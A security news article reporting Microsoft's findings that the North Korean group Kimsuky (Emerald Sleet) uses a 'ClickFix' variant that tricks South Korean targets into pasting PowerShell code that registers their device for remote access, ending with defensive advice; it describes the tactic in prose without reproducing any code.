North Korean state-sponsored group Kimsuky (aka Emerald Sleet, aka VELVET CHOLLIMA) is attempting to deliver malware to South Korean targets by leveraging the so-called “ClickFix” tactic.
A relatively new tactic
The ClickFix social engineering tactic has been dubbed thus because of the initial pretext used by malware peddlers: the users, wanting to read a webpage or document or join a video call, are shown a fake browser notice saying that the page or doc cannot be displayed correctly or the microphone cannot work as it should until they click the “Fix It” button and follow the outlined steps.
Unfortunately, the outlined steps lead them to (usually) copy, paste, and run a malicious PowerShell script that downloads and runs malware without the web browser getting involved and without the user having to manually execute the file.
Variants of the tactic involve users having to perform the steps to solve fake human verification challenges or to install a needed security update.
Since the middle of 2024, the tactic has been used to deliver a variety of infostealers and dropper malware in targeted and “spray and pray” campaigns, mostly to Windows users but occasionally to Linux and macOS users, as well.
The ClickRegister variant
In this latest attack spotted by Microsoft’s threat analysts, the North Korean hackers initiate communications with the targets, build a rapport with them, and the send a spear-phishing email with an PDF attachment.
To view it, recipients are directed to a URL that provides instructions to register their device. This registration process entails opening PowerShell as an administrator and pasting code supplied by the threat actors:
The instructions (Source: Microsoft)
“Upon execution, the code installs a browser-based remote desktop tool and retrieves a certificate file with a hardcoded PIN from a remote server. The compromised system then communicates with the server to register the device using the downloaded certificate and PIN, enabling the attackers to access the device and exfiltrate data,” the analysts explained.
“Although this tactic has been observed in limited attacks since January 2025, it signifies a strategic shift in Emerald Sleet’s operations. Traditionally, the group has targeted individuals involved in international affairs, particularly those focusing on Northeast Asia, as well as NGOs, government agencies, and media outlets across North America, South America, Europe, and East Asia.”
While users should definitely be careful about they are installing their own devices, the ClickFix tactic and variants rely on users being tech-unsavvy and vulnerable to a good pretext.
Security awareness and anti-phishing training can only do so much. Organizations should lock down employee’s systems as much as possible and employ attack surface reduction rules to prevent common attack techniques.